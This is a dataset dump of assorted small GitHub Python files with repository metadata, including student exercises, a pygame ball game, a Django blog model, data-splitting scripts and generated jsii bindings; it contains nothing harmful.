blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
d45b69041b2d7b4260f82033c88baa86e258533e | f74bf8257ebab029d6602178f25b607691e1c73a | /Assignments/sixteen.py | f5cba5727436b5108e13c2c3d4821b7a6fe2789f | [] | no_license | Nipurnj62/Data-Science-class | f6562bd9b2e738c1b1c6522fe5f56dab3cc03be8 | 9def17f484ee77c20d95f6b1de536cb13c4e2d68 | refs/heads/master | 2021-06-19T04:46:45.844423 | 2021-03-29T01:25:13 | 2021-03-29T01:25:13 | 194,601,160 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 128 | py | new_list=input("enter some numbers")
outputlist=[i for i in new_list.split(',') if (int(i)%2!=0)]
print(' '.join(outputlist)) | [
"nipurnj62@gmail.com"
] | nipurnj62@gmail.com |
c55ea7bf368312fbf83a68848d1ea73bed091b7b | 0df9567a63aab012dabb4200e008fa3ce428f612 | /src/src-ch1/solitaryWave_fill.py | 173c55afc0c5f5b74546b7f8bae94f2b0096c5cd | [] | no_license | hong-hanh-dang/tkt4140 | 11c5690f3d655921ab1c441d09e2c3068109d74d | a3cf070091e2a31ad732fc2df4ea2e8f7fd5d125 | refs/heads/master | 2021-07-14T18:44:50.455440 | 2017-10-20T11:35:15 | 2017-10-20T11:35:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,875 | py | # src-ch1/solitaryWave.py
#import matplotlib; matplotlib.use('Qt4Agg')
import matplotlib.pylab as plt
#plt.get_current_fig_manager().window.raise_()
import numpy as np
#### set default plot values: ####
LNWDT=3; FNT=15
plt.rcParams['lines.linewidth'] = LNWDT; plt.rcParams['font.size'] = FNT
""" This script solves the problem with the solitary wave:
y'' = a*3*y*(1-y*3/2)
y(0) = 1, y'(0) = 0
or as a system of first order differential equations (y0 = y, y1 = y'):
y0' = y'
y1' = a*3*y0*(1-y0*3/2)
y0(0) = 1, y1(0) = 0
"""
a = 2./3
h = 0.2 # steplength dx
x_0, x_end = 0, 0.6
x = np.arange(x_0, x_end + h, h) # allocate x values
#### solution vectors: ####
Y0_euler = np.zeros_like(x) # array to store y values
Y1_euler = np.zeros_like(x) # array to store y' values
Y0_heun = np.zeros_like(x)
Y1_heun = np.zeros_like(x)
#### initial conditions: ####
Y0_euler[0] = 1 # y(0) = 1
Y1_euler[0] = 0 # y'(0) = 0
Y0_heun[0] = 1
Y1_heun[0] = 0
#### solve with euler's method ####
for n in range(len(x) - 1):
y0_n = Y0_euler[n] # y at this timestep
y1_n = Y1_euler[n] # y' at this timestep
"Fill in lines below"
f0 =
f1 =
"Fill in lines above"
Y0_euler[n + 1] = y0_n + h*f0
Y1_euler[n + 1] = y1_n + h*f1
#### solve with heun's method: ####
for n in range(len(x) - 1):
y0_n = Y0_heun[n] # y0 at this timestep (y_n)
y1_n = Y1_heun[n] # y1 at this timestep (y'_n)
"Fill in lines below"
f0 =
f1 =
y0_p =
y1_p =
f0_p =
f1_p =
"Fill in lines above"
Y0_heun[n + 1] = y0_n + 0.5*h*(f0 + f0_p)
Y1_heun[n + 1] = y1_n + 0.5*h*(f1 + f1_p)
Y0_taylor = 1 - x**2/2 + x**4/6
Y1_taylor = -x + (2./3)*x**3
Y0_analytic = 1./(np.cosh(x/np.sqrt(2))**2)
#### Print and plot solutions: ####
print "a) euler's method: y({0})={1}, y'({2})={3}".format(x_end, round(Y0_euler[-1], 4), x_end, round(Y1_euler[-1], 4))
print "b) heun's method: y({0})={1}, y'({2})={3}".format(x_end, round(Y0_heun[-1], 4), x_end, round(Y1_heun[-1], 4))
print "c) Taylor series: y({0})={1}, y'({2})={3}".format(x_end, round(Y0_taylor[-1], 4), x_end, round(Y1_taylor[-1], 4))
print "d) Analytical solution: y({0})={1}".format(x_end, round(Y0_analytic[-1], 4))
plt.figure()
plt.plot(x, Y0_euler, 'r-o')
plt.plot(x, Y0_heun, 'b-^')
plt.plot(x, Y0_taylor, 'g-*')
plt.plot(x, Y0_analytic, 'k--')
eulerLegend = 'euler, y({0})={1}'.format(x_end, round(Y0_euler[-1], 4))
heunLegend = 'heun, y({0})={1}'.format(x_end, round(Y0_heun[-1], 4))
taylorLegend = 'taylor, y({0})={1}'.format(x_end, round(Y0_taylor[-1], 4))
analyticLegend = 'analytic, y({0})={1}'.format(x_end, round(Y0_analytic[-1], 4))
plt.legend([eulerLegend, heunLegend, taylorLegend, analyticLegend], loc='best', frameon=False)
plt.show()
| [
"leif.r.hellevik@ntnu.no"
] | leif.r.hellevik@ntnu.no |
3434db1840ba2cf28143ffff4c81e6aeca86c460 | 0180dc800ce935599cfcd59d0b33c58a765ed9f6 | /helloWorld.py | 49b7c6c620a20e0c1fc23772c82c2243104c35e5 | [] | no_license | gxxru-xx/helloPython | 4fd3288b4a4c0f8ad9f0a245f321b324c33fe9e2 | ff6b85e72b863fb3b961d9f5f9630a311936cde5 | refs/heads/master | 2022-10-29T08:46:17.984225 | 2018-06-26T12:43:56 | 2018-06-26T12:43:56 | 138,736,561 | 0 | 1 | null | 2022-10-02T23:50:03 | 2018-06-26T12:43:07 | Python | UTF-8 | Python | false | false | 337 | py | import random
import sys
import os
tested_string = "ABX"
alphabet = [0] * 256
ind = 0
flague = 0
for i in range(0, len(tested_string)):
ind = ord(tested_string[i])
alphabet[ind] += 1
if alphabet[ind] == 2:
print(chr(ind))
flague = 1
break
if flague == 0:
print("No recurrent characters found")
| [
"mateusiak.piotr@gmail.com"
] | mateusiak.piotr@gmail.com |
59fdb4c109f74526d8dec4f3b43562086178e9a8 | 4261091222a40eeb6a13c2bbb7e515340be2adc1 | /Uploads/test.py | 5cde8a9fd1e2218009ba6644c0cd0a428ba558eb | [] | no_license | safouman/ScheidtBachman_Middleware | 0e9697ac7987c676626d41d3cabb1b9bb3845652 | fae774cb772a2c37bc8cd85080d68eaeb1ca2d7a | refs/heads/master | 2021-01-20T21:12:18.010424 | 2017-08-10T12:21:02 | 2017-08-10T12:21:02 | 65,056,264 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 822 | py | import argparse
from Logging_Config.Logger import Logger
parser = argparse.ArgumentParser(
description='THIS SCRIPT SERVES AS A MIDDLEWARE FOR INPUT DATA YOU CAN MODIFY YOUR DATA HERE ')
parser.add_argument('-i', '--input', help='Input data', required=True)
parser.add_argument('-n', '--name', help='Name', required=True)
args = parser.parse_args()
logger = Logger(args.input).get()
try:
# ADDING ARGUMENT TO THE SCRIPT
logger.info("%s ready to start",args.name)
# HERE YOU CAN DO WHATEVER YOU WANT WITH THE INPUT DATA
logger.info("Received data: %s ", str(args.input))
##############################START CODING FROM HERE###################"
# YOU NEED TO PRINT YOUR OUTPUT SO THE APP CAN CATCH IT
print args.input+'555555'
except Exception as e:
logger.error('ERROR %s', e)
| [
"safouman@gmail.com"
] | safouman@gmail.com |
74be74cb99d2362e431410164bca951e2487f848 | 0b110ef4139abb720636b19d10e88e7332849266 | /packages/jsii-pacmak/test/expected.jsii-calc/python/src/jsii_calc/python_self/__init__.py | 5d63911e34b6bbff8bf5a53687fce452ee266d8c | [
"ISC",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | sullis/jsii | 2f2f3690ffd3e8dfeb57d9649c1323c3bc3263d4 | f124bc8b0ebf9243f45c59be6209ca01fd967dea | refs/heads/master | 2023-01-28T08:40:01.435441 | 2020-07-22T14:40:07 | 2020-07-22T14:40:07 | 200,978,923 | 1 | 0 | Apache-2.0 | 2023-01-24T01:38:33 | 2019-08-07T05:32:38 | TypeScript | UTF-8 | Python | false | false | 3,438 | py | import abc
import builtins
import datetime
import enum
import typing
import jsii
import jsii.compat
import publication
from .._jsii import *
class ClassWithSelf(
metaclass=jsii.JSIIMeta, jsii_type="jsii-calc.PythonSelf.ClassWithSelf"
):
"""
stability
:stability: experimental
"""
def __init__(self_, self: str) -> None:
"""
:param self: -
stability
:stability: experimental
"""
jsii.create(ClassWithSelf, self_, [self])
@jsii.member(jsii_name="method")
def method(self_, self: jsii.Number) -> str:
"""
:param self: -
stability
:stability: experimental
"""
return jsii.invoke(self_, "method", [self])
@builtins.property
@jsii.member(jsii_name="self")
def self(self) -> str:
"""
stability
:stability: experimental
"""
return jsii.get(self, "self")
class ClassWithSelfKwarg(
metaclass=jsii.JSIIMeta, jsii_type="jsii-calc.PythonSelf.ClassWithSelfKwarg"
):
"""
stability
:stability: experimental
"""
def __init__(self_, *, self: str) -> None:
"""
:param self:
stability
:stability: experimental
"""
props = StructWithSelf(self=self)
jsii.create(ClassWithSelfKwarg, self_, [props])
@builtins.property
@jsii.member(jsii_name="props")
def props(self) -> "StructWithSelf":
"""
stability
:stability: experimental
"""
return jsii.get(self, "props")
@jsii.interface(jsii_type="jsii-calc.PythonSelf.IInterfaceWithSelf")
class IInterfaceWithSelf(jsii.compat.Protocol):
"""
stability
:stability: experimental
"""
@builtins.staticmethod
def __jsii_proxy_class__():
return _IInterfaceWithSelfProxy
@jsii.member(jsii_name="method")
def method(self_, self: jsii.Number) -> str:
"""
:param self: -
stability
:stability: experimental
"""
...
class _IInterfaceWithSelfProxy:
"""
stability
:stability: experimental
"""
__jsii_type__ = "jsii-calc.PythonSelf.IInterfaceWithSelf"
@jsii.member(jsii_name="method")
def method(self_, self: jsii.Number) -> str:
"""
:param self: -
stability
:stability: experimental
"""
return jsii.invoke(self_, "method", [self])
@jsii.data_type(
jsii_type="jsii-calc.PythonSelf.StructWithSelf",
jsii_struct_bases=[],
name_mapping={"self": "self"},
)
class StructWithSelf:
def __init__(self_, *, self: str) -> None:
"""
:param self:
stability
:stability: experimental
"""
self_._values = {
"self": self,
}
@builtins.property
def self(self) -> str:
"""
stability
:stability: experimental
"""
return self._values.get("self")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return "StructWithSelf(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
__all__ = [
"ClassWithSelf",
"ClassWithSelfKwarg",
"IInterfaceWithSelf",
"StructWithSelf",
]
publication.publish()
| [
"noreply@github.com"
] | sullis.noreply@github.com |
0c951d03079b7356ec0f67cbf8d87e34b58a4537 | 1edf4c50123a6001b30cff3ad098d566f058ed8f | /utility/dataSplit.py | d7b3bfe61f47b3d43122e90d8c00effdac2fb8d1 | [] | no_license | HaohanWang/geneExpressionRepresentation | be19fa9c89b55063f22614bf6938249275264369 | 5e6881f7e5f3c3a04325437a4894387219e852b8 | refs/heads/master | 2021-01-10T17:44:36.209021 | 2016-05-03T05:44:19 | 2016-05-03T05:44:19 | 50,133,394 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,246 | py | import numpy as np
# ids = [line.strip() for line in open('../data/ids.txt')]
#
# text = [line.strip() for line in open('../data/ppi_ids.txt')]
#
# ppi = {}
#
# for line in text:
# items = line.split()
# id1 = items[0]
# id2 = items[1]
# ppi[(id1, id2)] = 0
#
# count = 0
#
# p = []
# n = []
# np.random.seed(1)
#
# for id1 in ids:
# count += 1
# if count %100==0:
# print id1
# for id2 in ids:
# if (id1, id2) in ppi:
# p.append((id1, id2))
# else:
# if np.random.random() < 0.00017:
# n.append((id1, id2))
#
# print len(n)
# p = p[:12500]
# n = n[:12500]
#
# for i in range(5):
# f1 = open('../data/split/ids_train_'+str(i+1)+'.txt', 'w')
# f2 = open('../data/split/ids_test_'+str(i+1)+'.txt', 'w')
# f1_ = open('../data/split/labels_train_'+str(i+1)+'.txt', 'w')
# f2_ = open('../data/split/labels_test_'+str(i+1)+'.txt', 'w')
#
# for k in range(i*2500, (i+1)*2500):
# f2.writelines(p[k][0]+'\t'+p[k][1]+'\n')
# f2_.writelines('1\n')
# for k in range(i*2500, (i+1)*2500):
# f2.writelines(n[k][0]+'\t'+n[k][1]+'\n')
# f2_.writelines('0\n')
#
# for k in range(0, i*2500):
# f1.writelines(p[k][0]+'\t'+p[k][1]+'\n')
# f1_.writelines('1\n')
# for k in range((i+1)*2500, 12500):
# f1.writelines(p[k][0]+'\t'+p[k][1]+'\n')
# f1_.writelines('1\n')
#
# for k in range(0, i*2500):
# f1.writelines(n[k][0]+'\t'+n[k][1]+'\n')
# f1_.writelines('0\n')
# for k in range((i+1)*2500, 12500):
# f1.writelines(n[k][0]+'\t'+n[k][1]+'\n')
# f1_.writelines('0\n')
#
# f1.close()
# f2.close()
# f1_.close()
# f2_.close()
ids = [line.strip() for line in open('../data/ids.txt')]
print len(ids)
data = np.loadtxt('../data/ge.csv', delimiter=',')
print data.shape
ge = {}
for i in range(len(ids)):
ge[ids[i]] = data[i,:]
#
# for i in range(5):
# t1l = []
# t1r = []
# t2l = []
# t2r = []
#
# #train
# text = [line.strip() for line in open('../data/split/ids_train_'+str(i+1)+'.txt')]
# for line in text:
# items = line.split()
# id1 = items[0]
# id2 = items[1]
# t1l.append(ge[id1])
# t1r.append(ge[id2])
# np.savetxt('../data/split/data_train_'+str(i+1)+'_a.txt', t1l, delimiter=',')
# np.savetxt('../data/split/data_train_'+str(i+1)+'_b.txt', t1r, delimiter=',')
#
# #test
# text = [line.strip() for line in open('../data/split/ids_test_'+str(i+1)+'.txt')]
# for line in text:
# items = line.split()
# id1 = items[0]
# id2 = items[1]
# t2l.append(ge[id1])
# t2r.append(ge[id2])
# np.savetxt('../data/split/data_test_'+str(i+1)+'_a.txt', t2l, delimiter=',')
# np.savetxt('../data/split/data_test_'+str(i+1)+'_b.txt', t2r, delimiter=',')
text = [line.strip() for line in open('../data/ids_final.txt')]
t1l = []
t1r = []
for line in text:
items = line.split()
id1 = items[0]
id2 = items[1]
t1l.append(ge[id1])
t1r.append(ge[id2])
np.savetxt('../data/split/data_final_a.txt', t1l, delimiter=',')
np.savetxt('../data/split/data_final_b.txt', t1r, delimiter=',')
| [
"haohanw@andrew.cmu.edu"
] | haohanw@andrew.cmu.edu |
88c814afb0945567dd2ebac613efd519b7762bee | b11cd714862159d8fbf194e58244ad8c5dacd23c | /blog/models.py | 760fabe968fb5f9bc5a8546ab34300d7eff6b167 | [] | no_license | tjhooper1/django-portfolio | d25bf021cad6f180c00e3a56daea5081c6847c3d | f9150ce4ed31ba980744792ef62919ad089380d1 | refs/heads/master | 2020-12-28T00:40:15.645585 | 2020-02-11T03:46:54 | 2020-02-11T03:46:54 | 238,122,131 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 250 | py | from django.db import models
# Create your models here.
class Blog(models.Model):
title = models.CharField(max_length=200)
description = models.TextField()
date = models.DateField()
def __str__(self):
return self.title
| [
"tomh386@gmail.com"
] | tomh386@gmail.com |
9fc1f08a73738b003c3fb875629101d1a3136c61 | 28213f0414a769fff8502bc98fab5150a84ee764 | /Test/venv/Example/4/6.py | 5751d64efa8dfb670c5582fbd98493edce53f23c | [] | no_license | darkleave/python-test | 46c1a595e2c6120d9276096be8344a029fde1064 | fb98303001d2e71f1395ffec930c48b51fd7b2a7 | refs/heads/master | 2022-11-07T12:04:36.420997 | 2018-07-17T12:24:25 | 2018-07-17T12:24:25 | 139,572,846 | 0 | 1 | null | 2022-10-29T17:58:49 | 2018-07-03T11:21:43 | Python | UTF-8 | Python | false | false | 3,089 | py | #5. has_key
#has_key 方法可以检查字典中是否含有特定的键,表达式d.has_key(k)相当于表达式k in d.
#使用哪个方式很大程度上取决于个人的喜好,python3.0不包括这个函数
'''
d={}
hasTest = d.has_key('name')
print(hasTest)
d['name'] = 'Eric'
hasTest = d.has_key('name')
'''
#6 items和iteritems
#items方法将字典所有的项以列表方式返回,列表中的每一项都表示为(键,值)的形式,,
#但是在项在返回时并没有遵循特定的次序
d = {'title':'Python Web Site','url':'http://www.python.org','spam':0}
itemTest = d.items()
print(itemTest)
#iteritems 方法的作用大致相同,但是会返回一个迭代器对象而不是列表 python3.0废弃
#it = d.iteritems()
#print(it)
#7. keys和iterkeys
#keys和iterkeys将字典中的键以列表形式返回,而iterkeys则返回针对键的迭代器
print(d.keys())
#print(d.iterkeys()) python3.0废弃
#8. pop
#pop方法用来获得对应于给定键的值,然后将这个键值对从字典中移除
d = {'x':1,'y':2}
popTest = d.pop('x')
print(popTest)
print(d)
#9. popitem
#popitem方法类似于list.pop,后者会弹出列表的最后一个元素,但不同的是,popitem弹出随机的项,
#因为字典并没有“最后的元素”或者其他有关顺序的概念
#若想一个接一个地移除并处理项,这个方法就非常有效了(因为不用首先获取键的列表)
d = {'url':'http://www.python.org','spam':0,'title':'Python Web Site'}
popTest = d.popitem()
print(popTest)
print(d)
#尽管popitem和列表的pop方法很类似,但字典中并没有与append等价的方法,因为字典是无序的,类似于append的
#方法是没有任何意义的
#10. setdefault
#setdefault方法在某种程度上类似于get方法,能够获得与给定键相关联的值,
#除此之外,setdefault还能在字典中不含有给定键的情况下设定相应的键值。
d = {}
defaultTest = d.setdefault('name','N/A')
print('defaultTest:' + str(defaultTest))
print(d)
d['name'] = 'Gumby'
defaultTest = d.setdefault('name','N/A')
print(defaultTest)
print(d)
#可以看到,当键不存在的时候,setdefault返回默认值并且相应地更新字典,如果键存在,
#就返回与其对应的值,但不改变字典,默认值是可选的,这点和get一样,如果不设定,会默认使用none
d = {}
print(d.setdefault('name'))
print(d)
#11. update
#update方法可以利用一个字典项更新另外一个字典
#提供的字典中的项会被添加到旧的字典中,若有相同的键则会进行覆盖
d = {
'title':'Python Web Site',
'url':'http://www.python.org',
'changed':'Mar 14 22:09:15 MET 2008'
}
x = {'title':'Python Language Website','a':'aaaa'}
updateTest = d.update(x)
print('updateTest:' + str(updateTest))
print(d)
#12. values和itervalues
#values方法以列表的形式返回字典中的值(itervalues返回值的迭代器)
#与返回键的列表不同的是,返回值的列表中可以包含重复的元素
d = {}
d[1] = 1
d[2] = 2
d[3] = 3
d[4] = 1
print(d.values())
| [
"zhonghanzhong@zhixueyun.com"
] | zhonghanzhong@zhixueyun.com |
c8271cb5873fb6ff12af7456d432b92a3abae723 | d3af16898953a9b9d5e12293f54767ab397d06d1 | /test_python/src/libai.py | 4e9d2f997b117f4cc082074089ec9ab0c3753d89 | [] | no_license | pystart-hyj/HogwartsLG5-hyj | 014f4649f915c2ba2af9584534d49ce92799bf57 | 65c53bfe2fac7e2d959e625490ba0f83cd54326a | refs/heads/main | 2023-04-06T15:55:26.514696 | 2021-03-21T11:47:10 | 2021-03-21T11:47:10 | 322,327,759 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 115 | py | from test_python.src.hero import *
class LiBai(Hero):
hp = 80
speed = 2
name = '李白'
tools = [] | [
"“pystart-hyj@email.comgit config --global user.email “pystart-hyj@email.com"
] | “pystart-hyj@email.comgit config --global user.email “pystart-hyj@email.com |
075d141b1d7639164a27def725f825198ea7ae10 | c37acc989e77c42757bfae1bd0bececeeb821071 | /env/bin/easy_install-2.7 | 5f52fe7a7f82b9e9cdbbf35e41786a6c7dbf0a98 | [] | no_license | sohaveaniceday/lambda-test | 0504518f5696a62c2cee892ed769030059d8f804 | 16bf910c92f403b81f55fc074574e8b23df8dfc2 | refs/heads/master | 2020-05-24T02:42:24.002280 | 2019-05-18T07:44:37 | 2019-05-18T07:44:37 | 187,057,529 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 296 | 7 | #!/Users/richardturner/Documents/Developer/Projects/lambda-test/env/bin/python2.7
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"rclt201@gmail.com"
] | rclt201@gmail.com |
11b350fe81bcb1a68ce3436a03d2a36d6b23c074 | e9e8599822914b4ed33ce0ca1bf1b92391a27003 | /python/tarPackages.py | 771a84ded5314214e0f0b7451cf490f52843b1de | [] | no_license | Kinice/PlyThings | d049d9196767ad6db33dba92e2be9efb72536116 | 11343664e95367f9e7144c1a1645d351ce91ee25 | refs/heads/master | 2023-01-24T07:42:38.911824 | 2020-11-09T06:38:27 | 2020-11-09T06:38:27 | 46,183,415 | 3 | 1 | null | 2023-01-12T09:55:28 | 2015-11-14T17:03:19 | HTML | UTF-8 | Python | false | false | 3,200 | py | #coding=utf-8
import os,tarfile,datetime
ROOTDIR = os.path.abspath('.')
ROOTFILELIST = os.listdir(ROOTDIR)
txtFileName = 'time.txt'
hasTxt = False
rootDirs = []
diffLines = []
diffDir = []
txtList = []
files = []
timeList = []
def tarFiles(rootDir,fileList):
for i in range(0,len(fileList)):
fPath = os.path.join(rootDir,fileList[i])
if os.path.isdir(fPath):
tar = tarfile.open(fileList[i]+'.tar','w')
print '正在打包 ',rootDir,fileList[i]
for root,dir,files in os.walk(fPath):
for file in files:
fullpath = os.path.join(root,file)
tar.add(fullpath)
tar.close()
def getFileList(rootDir):
visited = {}
nodeStack = []
allfiles = []
visited[os.path.basename(rootDir)] = 1
nodeStack.append(rootDir)
while len(nodeStack)>0:
if os.path.isdir(nodeStack[len(nodeStack)-1]):
x = nodeStack[len(nodeStack)-1]
flist = os.listdir(x)
else:
nodeStack.pop()
continue
flag = False
if len(flist)>0:
for i in range(0,len(flist)):
if not flist[i] in visited.keys():
visited[flist[i]] = 1
flag = True
nodeStack.append(os.path.join(x,flist[i]))
if os.path.isfile(nodeStack[len(nodeStack)-1]):
allfiles.append(os.path.join(x,flist[i]))
break
if len(flist)==0 or flag==False:
nodeStack.pop()
return allfiles
def getFileStat(flist):
print '正在读取文件信息'
timeList = []
for i in range(0,len(flist)):
mtime = os.stat(flist[i]).st_mtime
date = datetime.datetime.fromtimestamp(mtime)
timeList.append(flist[i]+' '+date.strftime('%Y-%m-%d %H:%M:%S'))
return timeList
def createTxt(dir,name,tlist):
print '正在生成',name,'资源文件'
f = open(os.path.join(dir,name),'w')
for i in tlist:
f.write(i)
f.write('\n')
f.close()
for i in ROOTFILELIST:
if os.path.isdir(os.path.join(ROOTDIR,i)):
rootDirs.append(os.path.join(ROOTDIR,i))
else:
if i == txtFileName:
hasTxt = True
print '正在读取文件列表'
for i in rootDirs:
l = getFileList(os.path.join(ROOTDIR,i))
if(len(l)>0):
for j in l:
files.append(j)
timeList = getFileStat(files)
if hasTxt:
f = open(os.path.join(ROOTDIR,txtFileName),'r')
for line in f:
txtList.append(line.strip('\n'))
f.close()
for i in timeList:
if i not in txtList:
diffLines.append(i)
for i in txtList:
if i not in timeList:
diffLines.append(i)
if len(diffLines)>0:
for i in diffLines:
if os.path.basename(os.path.dirname(i[:-20])) not in diffDir:
diffDir.append(os.path.basename(os.path.dirname(i[:-20])))
tarFiles(ROOTDIR,diffDir)
createTxt(ROOTDIR,txtFileName,timeList)
else:
print '检测无文件修改'
else:
createTxt(ROOTDIR,txtFileName,timeList)
tarFiles(ROOTDIR,rootDirs)
| [
"szp93@126.com"
] | szp93@126.com |
30665cc9a04c96f8151128447b3694303cff9e74 | 293b7305b86628aa92e23ea10f799b4848661aa5 | /implugin/flashmsg/tests/test_models.py | 6cc1793d411b7303753914717ef8ebcdde503af4 | [] | no_license | socek/impaf-flashmsg | 2ce751c54ff8d9e95f38a691b3579320e3ace546 | 4af4355934f6edf512893f7e9dacfe188179ea62 | refs/heads/master | 2020-04-08T20:58:21.124723 | 2015-08-14T18:05:55 | 2015-08-14T18:05:55 | 38,713,760 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 655 | py | from mock import sentinel
from impaf.testing import PyTestCase
from ..models import FlashMessage
class TestFlasMessage(PyTestCase):
_object_cls = FlashMessage
def test_to_dict(self):
obj = self.object(sentinel.message, sentinel.msgtype)
assert obj.to_dict() == {
'message': sentinel.message,
'msgtype': sentinel.msgtype,
}
def test_from_dict(self):
obj = self.object()
obj.from_dict({
'message': sentinel.message,
'msgtype': sentinel.msgtype,
})
assert obj.message == sentinel.message
assert obj.msgtype == sentinel.msgtype
| [
"msocek@gmail.com"
] | msocek@gmail.com |
d63747c6b66f1cc13f19fbcc2e2a70e2493c87b2 | f12745e64ef5c58d7b465e4d00a72d1a9a48dc3c | /test.py | 086956571aeff9da45590d0a857777d6564234aa | [] | no_license | yyf330/endpointdemononthrinf | 47b7ae668271fe4f839e3c9e1ce41e9a2c34b423 | 815e9d1a26690bbbd1cfb926ab5830148ca3a93a | refs/heads/master | 2021-08-19T19:59:12.521992 | 2017-11-27T09:31:52 | 2017-11-27T09:31:52 | 111,651,684 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 238 | py | import socket
def get_host_ip():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('8.8.8.8', 80))
ip = s.getsockname()[0]
finally:
s.close()
return ip
print(get_host_ip())
| [
"‘daolin@qq.com’"
] | ‘daolin@qq.com’ |
b8d108b3ae4215918a09815113b782fa517301c5 | d5d94067324e2470a1f3ea500270a09f46140911 | /python-3/day10-5.py | 43ec47bea52d29885c03f208ac7024c57771121f | [] | no_license | angrytang/python_book | 1c616305fc64fea130d7f8b4eadb5aab131affe9 | e92088439fa7bdb81888123375999fa5aa5d4a07 | refs/heads/master | 2021-05-18T07:13:02.313549 | 2020-07-13T08:42:58 | 2020-07-13T08:42:58 | 251,174,260 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,512 | py | from enum import Enum, unique
from math import sqrt
from random import randint
import pygame
@unique
class Color(Enum):
RED = (255, 0, 0)
GREEN = (0, 255, 0)
BLUE = (0, 0, 255)
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
GRAY = (242, 242, 242)
@staticmethod
def random_color():
r = randint(0, 255)
g = randint(0, 255)
b = randint(0, 255)
return (r, g, b)
class Ball(object):
def __init__(self, x, y, radius, sx, sy, color=Color.RED):
self.x = x
self.y = y
self.radius = radius
self.sx = sx
self.sy = sy
self.color = color
self.alive = True
def move(self, screen):
self.x += self.sx
self.y += self.sy
if self.x - self.radius <= 0 or self.x + self.radius >= screen.get_width():
self.sx = -self.sx
if self.y - self.radius <= 0 or self.y + self.radius >= screen.get_height():
self.sy = -self.sy
def eat(self, other):
if self.alive and other.alive and self != other:
dx, dy = self.x - other.x, self.y - other.y
distance = sqrt(dx ** 2 + dy ** 2)
if distance < self.radius + other.radius and self.radius > other.radius:
other.alive = False
self.radius = self.radius + int(other.radius * 0.146)
def draw(self, screen):
pygame.draw.circle(screen, self.color, (self.x, self.y), self.radius, 0)
def main():
balls = []
pygame.init()
screen = pygame.display.set_mode((800, 600))
pygame.display.set_caption('大球吃小球')
running = True
while running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:
x, y = event.pos
radius = randint(10,100)
sx, sy = randint(-10, 10), randint(-10, 10)
color = Color.random_color()
ball = Ball(x, y, radius, sx, sy, color)
balls.append(ball)
screen.fill((255, 255, 255))
for ball in balls:
if ball.alive:
ball.draw(screen)
else:
balls.remove(ball)
pygame.display.flip()
pygame.time.delay(50)
for ball in balls:
ball.move(screen)
for other in balls:
ball.eat(other)
if __name__ == '__main__':
main() | [
"2746813385@qq.com"
] | 2746813385@qq.com |
900aa6cbdac11a4c268e17893b08765df01d5ce5 | 0556f80af60647c0ad229df799a1d9f3c5427cee | /euler12.py | 3064e79a8d119ee747810be415a251935ab66908 | [] | no_license | matsuyu/euler | 3b03bca44066b322bbcbe2c5f65f9276f1ec648b | cd30c4398d8dbf8b46feaa493db51410f5e0ccaa | refs/heads/master | 2021-01-01T03:53:38.779129 | 2016-04-17T10:02:32 | 2016-04-17T10:02:32 | 56,207,093 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 233 | py | def factor(n):
total=0
for i in range(1,int(n**0.5)+1):
if n%i==0:
total+=2
return total
i=1
number=0
while True:
number+=i
i+=1
if factor(number)>500:
print(number)
break
| [
"wang.yuheng@dhs.sg"
] | wang.yuheng@dhs.sg |
e7e368bb72c1d30694469bbb714a9bf0a7a544cb | 74ca902eb52e2f325fbe54927c5c2d41aea3471c | /namba/env/bin/easy_install | 2edb835f96bcf94fd6cfe1498c12e60d6b0a2b0e | [] | no_license | UlanDT/nambafood | 5da003536c1b5729358330f130f34d9f44019eaa | 41ef0422e36567c295eda8e383842c5882306b89 | refs/heads/master | 2023-04-13T14:19:30.710211 | 2021-04-24T10:13:07 | 2021-04-24T10:13:07 | 294,014,138 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 261 | #!/Users/Ulik/Desktop/namba/namba/env/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"Ulik@Ulanbeks-MacBook-Pro.local"
] | Ulik@Ulanbeks-MacBook-Pro.local | |
